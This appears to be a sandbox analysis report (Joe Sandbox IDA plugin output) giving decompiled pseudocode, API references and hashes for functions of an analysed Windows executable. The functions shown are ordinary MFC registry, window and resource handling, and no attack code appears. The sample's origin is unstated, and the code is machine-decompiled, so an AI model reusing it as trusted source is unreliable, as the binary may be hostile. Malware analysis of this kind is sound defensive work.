                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E004026F9(intOrPtr __ecx) {
				void* _v8;
				char _v12;
				int _v16;
				intOrPtr _v20;
				int _v24;
				long _t29;
				char* _t30;
				intOrPtr _t32;
				char** _t34;
				signed int _t39;
				char** _t43;
				char* _t45;

				 *((intOrPtr*)(__ecx + 0xa0)) = 0;
				_t45 =  *0x440008; // 0x433718
				_v20 = __ecx;
				_v8 = 0;
				_v12 = 0;
				_v24 = 4;
				_v16 = 0;
				_t34 = 0x440008;
				if(_t45 == 0) {
					L14:
					return 1;
				}
				do {
					_t29 = RegOpenKeyExA(0x80000001,  *_t34, 0, 1,  &_v8); // executed
					if(_t29 != 0) {
						goto L12;
					}
					_t8 =  &(_t34[1]); // 0x440028
					_t43 =  *_t8;
					while(1) {
						_t30 =  *_t43;
						if(_t30 == 0) {
							break;
						}
						if(RegQueryValueExA(_v8, _t30, 0,  &_v16,  &_v12,  &_v24) == 0 && _v16 == 4) {
							_t15 =  &(_t43[1]); // 0x1
							_t39 =  *_t15;
							_t32 = _v20;
							if(_v12 == 0) {
								 *(_t32 + 0xa0) =  *(_t32 + 0xa0) &  !_t39;
							} else {
								 *(_t32 + 0xa0) =  *(_t32 + 0xa0) | _t39;
							}
						}
						_v12 = 0;
						_v24 = 4;
						_v16 = 0;
						_t43 =  &(_t43[2]);
					}
					RegCloseKey(_v8);
					_v8 = 0;
					L12:
					_t34 =  &(_t34[2]);
				} while ( *_t34 != 0);
				goto L14;
			}















                                                                                                                            0x00402703
                                                                                                                            0x00402709
                                                                                                                            0x0040270f
                                                                                                                            0x00402712
                                                                                                                            0x00402715
                                                                                                                            0x00402718
                                                                                                                            0x0040271f
                                                                                                                            0x00402722
                                                                                                                            0x00402727
                                                                                                                            0x004027b5
                                                                                                                            0x004027bb
                                                                                                                            0x004027bb
                                                                                                                            0x0040272e
                                                                                                                            0x0040273c
                                                                                                                            0x00402744
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00402746
                                                                                                                            0x00402746
                                                                                                                            0x00402797
                                                                                                                            0x00402797
                                                                                                                            0x0040279b
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00402764
                                                                                                                            0x0040276f
                                                                                                                            0x0040276f
                                                                                                                            0x00402772
                                                                                                                            0x00402775
                                                                                                                            0x00402781
                                                                                                                            0x00402777
                                                                                                                            0x00402777
                                                                                                                            0x00402777
                                                                                                                            0x00402775
                                                                                                                            0x00402787
                                                                                                                            0x0040278a
                                                                                                                            0x00402791
                                                                                                                            0x00402794
                                                                                                                            0x00402794
                                                                                                                            0x004027a0
                                                                                                                            0x004027a6
                                                                                                                            0x004027a9
                                                                                                                            0x004027a9
                                                                                                                            0x004027ac
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            • RegOpenKeyExA.KERNELBASE(80000001,00440008,00000000,00000001,?), ref: 0040273C
                                                                                                                            • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,00000004), ref: 0040275C
                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 004027A0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseOpenQueryValue
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3677997916-0
                                                                                                                            • Opcode ID: ee8eb210a4d89ca49a5744d0cc24932ca8b5ca163d3b7a362b65358bb1e46c17
                                                                                                                            • Instruction ID: 38ceab1e49415e411b96aa4a5e02817b7aceb6095313906c14e9d3b28c23ab3b
                                                                                                                            • Opcode Fuzzy Hash: ee8eb210a4d89ca49a5744d0cc24932ca8b5ca163d3b7a362b65358bb1e46c17
                                                                                                                            • Instruction Fuzzy Hash: 032109B5D00208EFDB15CF85DE88AAEFBB8FF90305F2040AAD551B7290D3B45A40CB15
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00404ECA Relevance: 4.5, APIs: 3, Instructions: 40COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 75%
                                                                                                                            			E00404ECA() {
				signed int _t17;
				intOrPtr* _t28;
				intOrPtr* _t29;
				struct HWND__* _t34;
				void* _t35;

				_t28 =  *((intOrPtr*)(_t35 - 0x20));
				_t34 = 0;
				_t29 =  *((intOrPtr*)(_t35 - 0x28));
				if(_t29 != 0) {
					 *((intOrPtr*)( *_t29 + 0x18))(_t35 - 0x48);
					if(0 != 0) {
						 *((intOrPtr*)( *_t28 + 0x12c))(0);
					}
				}
				if(E0040A224(_t28, 0, _t34, 0) == 0) {
					 *((intOrPtr*)( *_t28 + 0x114))();
				}
				if(_t34 != 0 && ( *(_t28 + 0x3c) & 0x00000010) == 0) {
					DestroyWindow(_t34); // executed
					_t34 = 0;
				}
				if( *(_t35 - 0x14) != 0) {
					GlobalUnlock( *(_t35 - 0x14));
					GlobalFree( *(_t35 - 0x14));
				}
				_t17 = 0 | _t34 != 0x00000000;
				return E0041EA59(_t17);
			}








                                                                                                                            0x00404eca
                                                                                                                            0x00404ecf
                                                                                                                            0x00404ed1
                                                                                                                            0x00404ed6
                                                                                                                            0x00404ede
                                                                                                                            0x00404ee3
                                                                                                                            0x00404eea
                                                                                                                            0x00404eea
                                                                                                                            0x00404ee3
                                                                                                                            0x00404ef7
                                                                                                                            0x00404efd
                                                                                                                            0x00404efd
                                                                                                                            0x00404f05
                                                                                                                            0x00404f0e
                                                                                                                            0x00404f14
                                                                                                                            0x00404f14
                                                                                                                            0x00404f19
                                                                                                                            0x00404f1e
                                                                                                                            0x00404f27
                                                                                                                            0x00404f27
                                                                                                                            0x00404f31
                                                                                                                            0x00404f39

                                                                                                                            APIs
                                                                                                                            • DestroyWindow.USER32(00000000,?,?,?,Local AppWizard-Generated Applications), ref: 00404F0E
                                                                                                                            • GlobalUnlock.KERNEL32(?,?,?,?,Local AppWizard-Generated Applications), ref: 00404F1E
                                                                                                                            • GlobalFree.KERNEL32 ref: 00404F27
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Global$DestroyFreeUnlockWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2282381049-0
                                                                                                                            • Opcode ID: 7bce9c40932369a3d11da52e09677ed5440c5ebd5ddd97f0fe7ee925fafe40fa
                                                                                                                            • Instruction ID: a7a2bd9fb88274f9700f21a7c0b782ed51d117938d3a404cc3d7182e91d3309e
                                                                                                                            • Opcode Fuzzy Hash: 7bce9c40932369a3d11da52e09677ed5440c5ebd5ddd97f0fe7ee925fafe40fa
                                                                                                                            • Instruction Fuzzy Hash: 0701DB319001158FCB11AF68C8889EFF7B2BFD8305B151179E511FB2A6C7384C40CB95
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040A7CD Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 71COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 92%
                                                                                                                            			E0040A7CD(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t39;
				intOrPtr _t56;
				signed int _t58;
				signed int _t62;
				intOrPtr _t70;
				signed int _t76;
				void* _t78;
				void* _t82;

				_t82 = __eflags;
				_push(0x38);
				E0041E9B4(E00431457, __ebx, __edi, __esi);
				_push(E00405A19);
				_t56 = E0040E7CC(__ebx, 0x442940, __edi, __esi, _t82);
				 *((intOrPtr*)(_t78 - 0x14)) = _t56;
				if((0 | _t56 != 0x00000000) == 0) {
					E0040D8B0(0x442940);
				}
				_t4 = _t56 + 0x58; // 0x58
				_t58 = 7;
				_t5 = _t78 - 0x44; // -68
				_t39 = memcpy(_t5, _t4, _t58 << 2);
				_t70 =  *((intOrPtr*)(_t78 + 0x10));
				_t76 =  *(_t78 + 8);
				 *_t39 =  *(_t78 + 0xc);
				 *((intOrPtr*)(_t56 + 0x60)) =  *((intOrPtr*)(_t78 + 0x14));
				 *((intOrPtr*)(_t56 + 0x5c)) = _t70;
				 *((intOrPtr*)(_t56 + 0x64)) =  *((intOrPtr*)(_t78 + 0x18));
				 *((intOrPtr*)(_t78 - 4)) = 0;
				if(_t70 == 2 &&  *((intOrPtr*)(_t76 + 0x4c)) != 0) {
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t76 + 0x4c)))) + 0x60))(0);
				}
				 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
				if(_t70 == 0x110) {
					_t21 = _t78 + 8; // 0x8
					_t22 = _t78 - 0x28; // -40
					E00408EC6(_t76, _t22, _t21);
				}
				 *((intOrPtr*)(_t78 + 0x18)) =  *((intOrPtr*)( *_t76 + 0x108))(_t70,  *((intOrPtr*)(_t78 + 0x14)),  *((intOrPtr*)(_t78 + 0x18)));
				if(_t70 == 0x110) {
					_t28 = _t78 - 0x28; // -40
					E0040A751(_t56, 0, _t76, _t28,  *(_t78 + 8)); // executed
				}
				_t30 = _t56 + 0x58; // 0x58
				_t62 = 7;
				_t31 = _t78 - 0x44; // -68
				return E0041EA59(memcpy(_t30, _t31, _t62 << 2));
			}











                                                                                                                            0x0040a7cd
                                                                                                                            0x0040a7cd
                                                                                                                            0x0040a7d4
                                                                                                                            0x0040a7d9
                                                                                                                            0x0040a7e8
                                                                                                                            0x0040a7f3
                                                                                                                            0x0040a7f8
                                                                                                                            0x0040a7fa
                                                                                                                            0x0040a7fa
                                                                                                                            0x0040a7ff
                                                                                                                            0x0040a806
                                                                                                                            0x0040a807
                                                                                                                            0x0040a80a
                                                                                                                            0x0040a80f
                                                                                                                            0x0040a815
                                                                                                                            0x0040a818
                                                                                                                            0x0040a81d
                                                                                                                            0x0040a823
                                                                                                                            0x0040a826
                                                                                                                            0x0040a829
                                                                                                                            0x0040a82c
                                                                                                                            0x0040a839
                                                                                                                            0x0040a839
                                                                                                                            0x0040a83c
                                                                                                                            0x0040a846
                                                                                                                            0x0040a848
                                                                                                                            0x0040a84c
                                                                                                                            0x0040a851
                                                                                                                            0x0040a851
                                                                                                                            0x0040a86d
                                                                                                                            0x0040a870
                                                                                                                            0x0040a875
                                                                                                                            0x0040a87a
                                                                                                                            0x0040a87a
                                                                                                                            0x0040a8a9
                                                                                                                            0x0040a8ac
                                                                                                                            0x0040a8ad
                                                                                                                            0x0040a8b7

                                                                                                                            APIs
                                                                                                                            • __EH_prolog3_catch.LIBCMT ref: 0040A7D4
                                                                                                                              • Part of subcall function 0040E7CC: __EH_prolog3.LIBCMT ref: 0040E7D3
                                                                                                                              • Part of subcall function 0040D8B0: __CxxThrowException@8.LIBCMT ref: 0040D8C4
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Exception@8H_prolog3H_prolog3_catchThrow
                                                                                                                            • String ID: @)D
                                                                                                                            • API String ID: 1377961577-3123465904
                                                                                                                            • Opcode ID: 140177ae7591492fc98215d3f4a8b459d89bb9cba1ee938ec1f6ba4301ee0dcf
                                                                                                                            • Instruction ID: a99f084e278222f852a543506b8d832421319b2a8516891259f0f6c73d37a53d
                                                                                                                            • Opcode Fuzzy Hash: 140177ae7591492fc98215d3f4a8b459d89bb9cba1ee938ec1f6ba4301ee0dcf
                                                                                                                            • Instruction Fuzzy Hash: FA214A72A00209DFDF05EFA5C4819DE3BB6AF58314F10802AF905AB281D778A995DB95
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00401030 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 82%
                                                                                                                            			E00401030(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				char _v16;
				intOrPtr _v20;
				intOrPtr _v28;
				intOrPtr _v144;
				char _v148;
				char _v152;
				void* __esi;
				void* __ebp;
				signed int _t13;
				void* _t33;
				void* _t36;
				void* _t37;
				void* _t39;
				signed int _t40;
				void* _t44;

				_t44 = __eflags;
				_t35 = __edi;
				_t24 = __ebx;
				_t13 =  *0x441590; // 0x4917eadc
				 *[fs:0x0] =  &_v16;
				_t37 = __ecx;
				_v148 = 8;
				_v144 = 0xff;
				__imp__InitCommonControlsEx( &_v148, _t13 ^ (_t40 & 0xfffffff8) - 0x00000088, _t36,  *[fs:0x0], E0043226B, 0xffffffff);
				E00402E39(__ecx);
				E00404011(__ebx, __edi, _t37, 0);
				E004045D3(__ebx, _t37, _t33, __edi, _t39, "Local AppWizard-Generated Applications");
				E00401110(__ebx, __edi, _t39,  &_v148);
				_t34 =  &_v152;
				_v20 = 0;
				 *((intOrPtr*)(_t37 + 0x20)) =  &_v152;
				E00404F3C(_t24,  &_v152, _t34, _t35, _t37, _t44); // executed
				_v20 = 0xffffffff;
				E004047DF(_t24,  &_v152, _t35, _t37, _t44);
				 *[fs:0x0] = _v28;
				return 0;
			}


















                                                                                                                            0x00401030
                                                                                                                            0x00401030
                                                                                                                            0x00401030
                                                                                                                            0x0040104b
                                                                                                                            0x0040105a
                                                                                                                            0x00401060
                                                                                                                            0x00401067
                                                                                                                            0x0040106f
                                                                                                                            0x00401077
                                                                                                                            0x0040107f
                                                                                                                            0x00401086
                                                                                                                            0x00401095
                                                                                                                            0x0040109f
                                                                                                                            0x004010a4
                                                                                                                            0x004010a8
                                                                                                                            0x004010b5
                                                                                                                            0x004010b8
                                                                                                                            0x004010c1
                                                                                                                            0x004010cc
                                                                                                                            0x004010da
                                                                                                                            0x004010e6

                                                                                                                            APIs
                                                                                                                            • InitCommonControlsEx.COMCTL32 ref: 00401077
                                                                                                                              • Part of subcall function 00402E39: InterlockedExchange.KERNEL32(004451F8,?), ref: 00402E65
                                                                                                                              • Part of subcall function 004045D3: __strdup.LIBCMT ref: 004045E2
                                                                                                                              • Part of subcall function 004045D3: __strdup.LIBCMT ref: 004045F5
                                                                                                                              • Part of subcall function 00401110: LoadIconA.USER32(?,00000080), ref: 00401161
                                                                                                                              • Part of subcall function 00404F3C: __EH_prolog3_catch.LIBCMT ref: 00404F43
                                                                                                                              • Part of subcall function 00404F3C: FindResourceA.KERNEL32(?,?,00000005), ref: 00404F76
                                                                                                                              • Part of subcall function 00404F3C: LoadResource.KERNEL32(?,00000000), ref: 00404F7E
                                                                                                                              • Part of subcall function 00404F3C: LockResource.KERNEL32(?,00000024,004010BD), ref: 00404F8F
                                                                                                                              • Part of subcall function 004047DF: __EH_prolog3.LIBCMT ref: 004047E6
                                                                                                                            Strings
                                                                                                                            • Local AppWizard-Generated Applications, xrefs: 0040108E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Resource$Load__strdup$CommonControlsExchangeFindH_prolog3H_prolog3_catchIconInitInterlockedLock
                                                                                                                            • String ID: Local AppWizard-Generated Applications
                                                                                                                            • API String ID: 588914321-3869840320
                                                                                                                            • Opcode ID: f6e9fa4e2d90cfc3385f14a5e8e9f8d5c223d7403351c5534d15df14466a91e9
                                                                                                                            • Instruction ID: 6d62d88486c21a7d0f43a2d076003f8ffae7631a0e83ad1d80a892d95b44a773
                                                                                                                            • Opcode Fuzzy Hash: f6e9fa4e2d90cfc3385f14a5e8e9f8d5c223d7403351c5534d15df14466a91e9
                                                                                                                            • Instruction Fuzzy Hash: 0411A5B11187409BC364DF24D84275AB3E4BB88724F004B2EF569A36C1EF789508879B
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004068D0 Relevance: 3.1, APIs: 2, Instructions: 60COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 66%
                                                                                                                            			E004068D0(intOrPtr __ebx, void* __ecx) {
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t28;
				intOrPtr _t38;
				intOrPtr _t42;
				struct HINSTANCE__* _t44;
				intOrPtr _t45;
				void* _t47;
				intOrPtr _t48;
				signed int _t49;
				void* _t51;

				_t38 = __ebx;
				_t49 = _t51 - 0x1b0;
				_t28 =  *0x441590; // 0x4917eadc
				 *(_t49 + 0x1ac) = _t28 ^ _t49;
				_t47 = __ecx;
				E004067F3(_t28 ^ _t49, __ecx, _t42, __ecx);
				_t44 =  *(__ecx + 8);
				 *(_t49 + 0x1aa) =  *(_t49 + 0x1aa) & 0x00000000;
				 *(_t49 + 0x1a8) =  *(_t49 + 0x1a8) & 0x00000000;
				if(GetModuleFileNameW(_t44, _t49 - 0x60, 0x105) != 0) {
					if( *(_t49 + 0x1a8) == 0) {
						 *((intOrPtr*)(_t49 - 0x78)) = _t49 - 0x60;
						_push(_t49 - 0x80);
						 *((intOrPtr*)(_t49 - 0x80)) = 0x20;
						 *((intOrPtr*)(_t49 - 0x7c)) = 0x88;
						 *((intOrPtr*)(_t49 - 0x6c)) = 2;
						 *(_t49 - 0x64) = _t44;
						_t32 = E00406861(); // executed
						 *(_t47 + 0x80) = _t32;
						if(_t32 == 0xffffffff) {
							_push(_t49 - 0x80);
							 *((intOrPtr*)(_t49 - 0x6c)) = 3;
							_t32 = E00406861(); // executed
							 *(_t47 + 0x80) = _t32;
						}
						if( *(_t47 + 0x80) == 0xffffffff) {
							_push(_t49 - 0x80);
							 *((intOrPtr*)(_t49 - 0x6c)) = 1;
							_t32 = E00406861(); // executed
							 *(_t47 + 0x80) = _t32;
							if(_t32 == 0xffffffff) {
								 *(_t47 + 0x80) =  *(_t47 + 0x80) & 0x00000000;
							}
						}
					} else {
						SetLastError(0x6f);
					}
				}
				_pop(_t45);
				_pop(_t48);
				return E0041D773(_t32, _t38,  *(_t49 + 0x1ac) ^ _t49, _t42, _t45, _t48);
			}















                                                                                                                            0x004068d0
                                                                                                                            0x004068d1
                                                                                                                            0x004068de
                                                                                                                            0x004068e5
                                                                                                                            0x004068ed
                                                                                                                            0x004068ef
                                                                                                                            0x004068f4
                                                                                                                            0x004068f7
                                                                                                                            0x004068ff
                                                                                                                            0x00406919
                                                                                                                            0x00406927
                                                                                                                            0x00406936
                                                                                                                            0x0040693c
                                                                                                                            0x0040693d
                                                                                                                            0x00406944
                                                                                                                            0x0040694b
                                                                                                                            0x00406952
                                                                                                                            0x00406955
                                                                                                                            0x0040695d
                                                                                                                            0x00406963
                                                                                                                            0x00406968
                                                                                                                            0x00406969
                                                                                                                            0x00406970
                                                                                                                            0x00406975
                                                                                                                            0x00406975
                                                                                                                            0x00406982
                                                                                                                            0x00406987
                                                                                                                            0x00406988
                                                                                                                            0x0040698f
                                                                                                                            0x00406997
                                                                                                                            0x0040699d
                                                                                                                            0x0040699f
                                                                                                                            0x0040699f
                                                                                                                            0x0040699d
                                                                                                                            0x00406929
                                                                                                                            0x0040692b
                                                                                                                            0x0040692b
                                                                                                                            0x00406927
                                                                                                                            0x004069ac
                                                                                                                            0x004069af
                                                                                                                            0x004069bc

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 004067F3: GetModuleHandleA.KERNEL32(KERNEL32), ref: 00406801
                                                                                                                            • GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 00406911
                                                                                                                            • SetLastError.KERNEL32(0000006F), ref: 0040692B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Module$ErrorFileHandleLastName
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 613274587-0
                                                                                                                            • Opcode ID: 989fec44370d1ac271f28f812648fd570c90b23e1603e849f77366b7008993a8
                                                                                                                            • Instruction ID: e16f203f70601cfc8f2c42c492340aa245521e1a12f1d6257404eb35d78abadb
                                                                                                                            • Opcode Fuzzy Hash: 989fec44370d1ac271f28f812648fd570c90b23e1603e849f77366b7008993a8
                                                                                                                            • Instruction Fuzzy Hash: DB2141B19003089EDB20DF69C8497EEB7F8BF05318F11462EE46AE61C1DB785548CB46
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040A751 Relevance: 3.0, APIs: 2, Instructions: 44COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E0040A751(void* __ebx, void* __edx, intOrPtr* _a4, signed int _a8, signed int _a12) {
				struct tagRECT _v20;
				void* __ebp;
				void* _t15;
				signed int _t16;
				void* _t28;
				intOrPtr* _t30;
				void* _t32;

				_t28 = __edx;
				_t22 = __ebx;
				if((_a12 & 0x10000000) != 0) {
					return _t15;
				}
				_t30 = _a4;
				_t16 = E0040CE51(_t30);
				if((_t16 & 0x50000000) != 0) {
					L8:
					return _t16;
				}
				GetWindowRect( *(_t30 + 0x20),  &_v20);
				_t16 = _a8;
				if( *_t16 != _v20.left) {
					goto L8;
				}
				_t16 =  *(_t16 + 4);
				if(_t16 != _v20.top) {
					goto L8;
				}
				if(E0040A17C(__ebx, _t28, _t32, GetWindow( *(_t30 + 0x20), 4)) == 0) {
					L6:
					_t16 =  *((intOrPtr*)( *_t30 + 0x11c))();
					if(_t16 != 0) {
						_t16 = E00409B50(_t22, _t30, _t28, 0); // executed
					}
					goto L8;
				}
				_t16 = E0040CF40(_t20);
				if(_t16 != 0) {
					goto L8;
				}
				goto L6;
			}










                                                                                                                            0x0040a751
                                                                                                                            0x0040a751
                                                                                                                            0x0040a75e
                                                                                                                            0x0040a7ca
                                                                                                                            0x0040a7ca
                                                                                                                            0x0040a761
                                                                                                                            0x0040a766
                                                                                                                            0x0040a770
                                                                                                                            0x0040a7c8
                                                                                                                            0x00000000
                                                                                                                            0x0040a7c8
                                                                                                                            0x0040a779
                                                                                                                            0x0040a77f
                                                                                                                            0x0040a787
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040a789
                                                                                                                            0x0040a78f
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040a7a4
                                                                                                                            0x0040a7b1
                                                                                                                            0x0040a7b5
                                                                                                                            0x0040a7bd
                                                                                                                            0x0040a7c3
                                                                                                                            0x0040a7c3
                                                                                                                            0x00000000
                                                                                                                            0x0040a7bd
                                                                                                                            0x0040a7a8
                                                                                                                            0x0040a7af
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0040CE51: GetWindowLongA.USER32 ref: 0040CE5C
                                                                                                                            • GetWindowRect.USER32 ref: 0040A779
                                                                                                                            • GetWindow.USER32(?,00000004), ref: 0040A796
                                                                                                                              • Part of subcall function 0040CF40: IsWindowEnabled.USER32(?), ref: 0040CF49
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$EnabledLongRect
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3170195891-0
                                                                                                                            • Opcode ID: d2f271c8229770975c710b56c50841ae7e13be72353e809483c3e96657c6d8be
                                                                                                                            • Instruction ID: b6f8e6783b574c89532d86d1d99a9d22ca6a703ec7cd86b1b72fecb159f2d888
                                                                                                                            • Opcode Fuzzy Hash: d2f271c8229770975c710b56c50841ae7e13be72353e809483c3e96657c6d8be
                                                                                                                            • Instruction Fuzzy Hash: 8A017C316103049BDB10EB25C895B6F77F9AF14B14F40846AED02B73D1DB38ED108A9A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004011B0 Relevance: 3.0, APIs: 2, Instructions: 30windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E004011B0(void* __ebx, intOrPtr* __ecx, void* __eflags) {
				void* __edi;
				void* __esi;
				void* _t21;
				intOrPtr* _t23;

				_t23 = __ecx;
				E00404BEE(__ebx, __ecx, _t21);
				SendMessageA( *(_t23 + 0x20), 0x80, 1,  *(_t23 + 0x74)); // executed
				SendMessageA( *(_t23 + 0x20), 0x80, 0,  *(_t23 + 0x74)); // executed
				if(E004023F0(__ebx, SendMessageA, _t23) < 0) {
					 *((intOrPtr*)( *((intOrPtr*)( *_t23 + 0x150))))();
				}
				return 1;
			}







                                                                                                                            0x004011b2
                                                                                                                            0x004011b4
                                                                                                                            0x004011ce
                                                                                                                            0x004011df
                                                                                                                            0x004011e8
                                                                                                                            0x004011f4
                                                                                                                            0x004011f4
                                                                                                                            0x004011fd

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
